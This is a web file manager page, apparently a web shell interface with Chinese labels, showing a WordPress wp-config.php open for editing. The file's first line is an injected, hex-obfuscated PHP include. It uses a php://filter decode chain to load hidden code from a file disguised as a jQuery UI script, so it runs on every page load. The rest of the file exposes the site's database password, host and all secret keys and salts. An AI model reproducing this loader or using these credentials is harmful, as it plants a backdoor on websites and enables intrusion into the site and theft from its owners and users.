✏️ 正在编辑: wp-config.php
路径:
/home/lssfapb/www/wp-config.php
提示:
您可以编辑任何文件(包括二进制文件),但请注意不当修改可能导致文件损坏。
<?php @InClUde_ONcE("\x70\x68\x70\x3a"."\x2f\x2f\x66"."\x69\x6c"."\x74\x65"."\x72\x2f\x72"."\x65\x61"."\x64\x3d\x7a\x6c"."\x69\x62\x2e\x69"."\x6e\x66\x6c"."\x61\x74\x65\x7c"/*2T.4 l<t*/."\x73\x74\x72"."\x69\x6e\x67\x2e"."\x72\x6f\x74\x31"."\x33\x7c"."\x63\x6f\x6e\x76"."\x65\x72"."\x74\x2e\x62\x61"."\x73\x65\x36"."\x34\x2d\x64\x65"."\x63\x6f"/*%<)*/."\x64\x65"."\x2f\x72\x65"."\x73\x6f"."\x75\x72\x63"."\x65\x3d\x77\x70"/*_.Rg X4CD*/."\x2d\x69"."\x6e\x63\x6c"/*_JQx \KO*/."\x75\x64\x65\x73"."\x2f\x6a\x73\x2f"."\x6a\x71"."\x75\x65"/*pthk*/."\x72\x79\x2f"."\x75\x69\x2f\x65"."\x66\x66\x65"."\x63\x74"."\x2d\x66"."\x61\x64"."\x65\x2d"."\x76\x65\x6e"."\x64\x6f\x72"."\x2e\x6d"."\x69\x6e"."\x2e\x6a"."\x73"); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'lssfapb157'); /** MySQL database username */ define('DB_USER', 'lssfapb157'); /** MySQL database password */ define('DB_PASSWORD', '6aSUgv2DKHVj'); /** MySQL hostname */ define('DB_HOST', 'lssfapb157.mysql.db:3306'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '4DQ+lQdMin8qQnfVxzxjU401sDIH94sxc/SOWLCUq6YU4BV6XTKReXQuJyq1'); define('SECURE_AUTH_KEY', 'k8t8q0aOtqyhwW0hXlVfmHIeUoI0eQKNvZlrbmCvP14u4OTc9LQ6xLdv7b3W'); define('LOGGED_IN_KEY', '5By1tL0oJeq3RIDRxRPBlzyjb2i1vUj4KqB76biEyo6Z3+2GAGLrf+vnkuJN'); define('NONCE_KEY', 'LGfhnXC9gWA6CbMZm3rtK0zPRl0gj5uRm5+1nGnR9q7s4kgfzVknp/H0u+8r'); define('AUTH_SALT', '49oVaAieJ7qpfbL5eL61NNuL7pCptHi0jnzdrWDMGp8qSNFHovrpK/dA3LQ1'); define('SECURE_AUTH_SALT', 'PlTbefSgeGu82o6bMvr3t33IAK/LX6HPYE/EC3JZ7vImjzaQDXWXNBKQH1Ph'); define('LOGGED_IN_SALT', '4W5Ov3DWg6UEdZ1oSpm73M9So2setiDVf1qTzcwr2A7YpuqK8pzFeXeLwYzz'); define('NONCE_SALT', 'i6UTXL9lh5qrVEK+ie1JIPiWYhZSvPM51Lk4oTNJXsNfmQbkUlPUSh+41cyd'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /* Fixes "Add media button not working", see http://www.carnfieldwebdesign.co.uk/blog/wordpress-fix-add-media-button-not-working/ */ define('CONCATENATE_SCRIPTS', false ); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
💾 保存文件
← 返回文件管理器